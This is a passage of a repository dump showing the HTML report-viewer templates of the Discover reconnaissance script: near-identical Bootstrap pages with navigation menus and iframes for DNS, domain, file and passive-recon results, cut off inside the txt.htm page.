 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/data/xls.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <!-- CSS -->
 9 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
10 | </head>
11 | 
12 | <body>
13 | <pre>
14 | 
15 | 


--------------------------------------------------------------------------------
/report/pages/config.htm:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="en">
 3 | <head>
 4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
 5 |     <meta charset="utf-8">
 6 |     <title>Reporting Framework</title>
 7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 8 |     <meta name="author v3" content="Hector Portillo">
 9 |     <meta name="Description" content="Discover Script's Report Readout">
10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
11 |     <!-- CSS -->
12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
13 |     <script src="../assets/javascript/jquery.min.js"></script>
14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
15 | </head>
16 | 
17 | <body class="inc-iframe-parent">
18 | <!-- Start nav bar-->
19 | <nav class="navbar inc-app-bar">
20 |     <div class="container-fluid">
21 |         <!-- Brand and toggle get grouped for better mobile display -->
22 |         <div class="navbar-header">
23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
24 |                 <span class="sr-only">Toggle navigation</span>
25 |                 <span class="icon-bar"></span>
26 |                 <span class="icon-bar"></span>
27 |                 <span class="icon-bar"></span>
28 |             </button>
29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
30 |                 <span class="inc-banner-logo"></span>
31 |             </a>
32 |         </div>
33 | 
34 |         <!-- Start of the navbar -->
35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
36 |             <ul class="nav navbar-nav">
37 |                 <li class=""><a href="../index.htm">Home</a></li>
38 | 
39 |                 <li class="dropdown">
40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Contacts <b class="caret"></b></a>
41 |                     <ul class="dropdown-menu">
42 |                         <li><a href="summary.htm">Summary</a></li>
43 |                         <li><a href="emails.htm">Emails</a></li>
44 |                         <li><a href="names.htm">Names</a></li>
45 |                     </ul>
46 |                 </li>
47 | 
48 |                 <li class="active dropdown">
49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
50 |                     <ul class="dropdown-menu">
51 |                         <li><a href="config.htm">Config</a></li>
52 |                         <li><a href="maps.htm">Maps</a></li>
53 |                         <li><a href="records.htm">Records</a></li>
54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
55 |                     </ul>
56 |                 </li>
57 | 
58 |                 <li class="dropdown">
59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
60 |                     <ul class="dropdown-menu">
61 |                         <li><a href="hosts.htm">Hosts</a></li>
62 |                         <li><a href="squatting.htm">Squatting</a></li>
63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
66 |                     </ul>
67 |                 </li>
68 | 
69 |                 <li class="dropdown">
70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
71 |                     <ul class="dropdown-menu">
72 |                         <li><a href="xls.htm">Excel</a></li>
73 |                         <li><a href="pdf.htm">PDF</a></li>
74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
75 |                         <li><a href="txt.htm">Text</a></li>
76 |                         <li><a href="doc.htm">Word</a></li>
77 |                     </ul>
78 |                 </li>
79 |                 <li class="dropdown">
80 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
81 |                     <ul class="dropdown-menu">
82 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
83 |                     </ul>
84 |                 </li>
85 | 
86 |             </ul>
87 |         </div><!-- /.navbar-collapse -->
88 |     </div><!-- /.container-fluid -->
89 | </nav>
90 | 
91 | <!-- Page Content -->
92 | <div class="container">
93 |     <div class="inc-page-header">
94 |         <h1>DNS <span class="inc-icon inc-icon-angle-right"></span> Config</h1>
95 |     </div>
96 | 


--------------------------------------------------------------------------------
/report/pages/doc.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="active dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>Files <span class="inc-icon inc-icon-angle-right"></span> Word</h1>
 97 |     </div>
 98 |     <div class="embed-responsive embed-responsive-16by9">
 99 |         <iframe src="../data/doc.htm" class="embed-responsive-item"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/hosts.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="active dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>Domain <span class="inc-icon inc-icon-angle-right"></span> Hosts</h1>
 97 |     </div>
 98 |     <div class="embed-responsive embed-responsive-16by9">
 99 |         <iframe src="../data/hosts.htm" class="embed-responsive-item"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/maps.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="active dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>DNS <span class="inc-icon inc-icon-angle-right"></span> Maps</h1>
 97 |     </div>
 98 |     <div>
 99 |         <img src="../assets/images/dnsdumpster.png" class="img-responsive" alt="_">
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/pdf.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="active dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>Files <span class="inc-icon inc-icon-angle-right"></span> PDF</h1>
 97 |     </div>
 98 |     <div class="embed-responsive embed-responsive-16by9">
 99 |         <iframe src="../data/pdf.htm" class="embed-responsive-item"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/registered-domains.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="active dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
 61 |                         <li><a href="hosts.htm">Hosts</a></li>
 62 |                         <li><a href="squatting.htm">Squatting</a></li>
 63 |                         <li><a href="subdomains.htm">Subdomains</a></li>
 64 |                         <li><a href="whois-domain.htm">Whois Domain</a></li>
 65 |                         <li><a href="whois-ip.htm">Whois IP</a></li>
 66 |                     </ul>
 67 |                 </li>
 68 | 
 69 |                 <li class="dropdown">
 70 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Files <b class="caret"></b></a>
 71 |                     <ul class="dropdown-menu">
 72 |                         <li><a href="xls.htm">Excel</a></li>
 73 |                         <li><a href="pdf.htm">PDF</a></li>
 74 |                         <li><a href="ppt.htm">PowerPoint</a></li>
 75 |                         <li><a href="txt.htm">Text</a></li>
 76 |                         <li><a href="doc.htm">Word</a></li>
 77 |                     </ul>
 78 |                 </li>
 79 | 
 80 |                 <li class="dropdown">
 81 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Reports <b class="caret"></b></a>
 82 |                     <ul class="dropdown-menu">
 83 |                         <li><a href="passive-recon.htm">Passive Recon</a></li>
 84 |                     </ul>
 85 |                 </li>
 86 | 
 87 |             </ul>
 88 |         </div><!-- /.navbar-collapse -->
 89 |     </div><!-- /.container-fluid -->
 90 | </nav>
 91 | 
 92 | <!-- Page Content -->
 93 | <div class="container-fluid">
 94 |     <!-- Container to center contents -->
 95 |     <div class="inc-page-header">
 96 |         <h1>DNS <span class="inc-icon inc-icon-angle-right"></span> Registered Domains</h1>
 97 |     </div>
 98 |     <div>
 99 |         <iframe src="../data/registered-domains.htm" class="inc-iframe-full-width"></iframe>
100 |     </div>
101 | </div>
102 | 
103 | </body>
104 | </html>
105 | 


--------------------------------------------------------------------------------
/report/pages/txt.htm:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html lang="en">
  3 | <head>
  4 |     <meta http-equiv="content-type" content="text/html; charset=UTF-8">
  5 |     <meta charset="utf-8">
  6 |     <title>Reporting Framework</title>
  7 |     <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  8 |     <meta name="author v3" content="Hector Portillo">
  9 |     <meta name="Description" content="Discover Script's Report Readout">
 10 |     <link rel="stylesheet" href="../assets/css/bootstrap.min.css">
 11 |     <!-- CSS -->
 12 |     <link rel="stylesheet" type="text/css" href="../assets/css/styles.css"/>
 13 |     <script src="../assets/javascript/jquery.min.js"></script>
 14 |     <script src="../assets/javascript/bootstrap.min.js"></script>
 15 | </head>
 16 | 
 17 | <body class="inc-iframe-parent">
 18 | <!-- Start nav bar-->
 19 | <nav class="navbar inc-app-bar">
 20 |     <div class="container-fluid">
 21 |         <!-- Brand and toggle get grouped for better mobile display -->
 22 |         <div class="navbar-header">
 23 |             <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#incPrimaryAppBar" aria-expanded="false">
 24 |                 <span class="sr-only">Toggle navigation</span>
 25 |                 <span class="icon-bar"></span>
 26 |                 <span class="icon-bar"></span>
 27 |                 <span class="icon-bar"></span>
 28 |             </button>
 29 |             <a class="navbar-brand" href="https://github.com/leebaird/discover" target="_blank">
 30 |                 <span class="inc-banner-logo"></span>
 31 |             </a>
 32 |         </div>
 33 | 
 34 |         <!-- Start of the navbar -->
 35 |         <div class="collapse navbar-collapse inc-primary-nav" id="incPrimaryAppBar">
 36 |             <ul class="nav navbar-nav">
 37 |                 <li class=""><a href="../index.htm">Home</a></li>
 38 | 
 39 |                 <li class="dropdown">
 40 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">General <b class="caret"></b></a>
 41 |                     <ul class="dropdown-menu">
 42 | 				    <li><a href="summary.htm">Summary</a></li>
 43 |                         <li><a href="emails.htm">Emails</a></li>
 44 |                         <li><a href="names.htm">Names</a></li>
 45 |                     </ul>
 46 |                 </li>
 47 | 
 48 |                 <li class="dropdown">
 49 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">DNS <b class="caret"></b></a>
 50 |                     <ul class="dropdown-menu">
 51 |                         <li><a href="config.htm">Config</a></li>
 52 |                         <li><a href="maps.htm">Maps</a></li>
 53 |                         <li><a href="records.htm">Records</a></li>
 54 |                         <li><a href="registered-domains.htm">Registered Domains</a></li>
 55 |                     </ul>
 56 |                 </li>
 57 | 
 58 |                 <li class="dropdown">
 59 |                     <a href="#" class="dropdown-toggle" data-toggle="dropdown">Domain <b class="caret"></b></a>
 60 |                     <ul class="dropdown-menu">
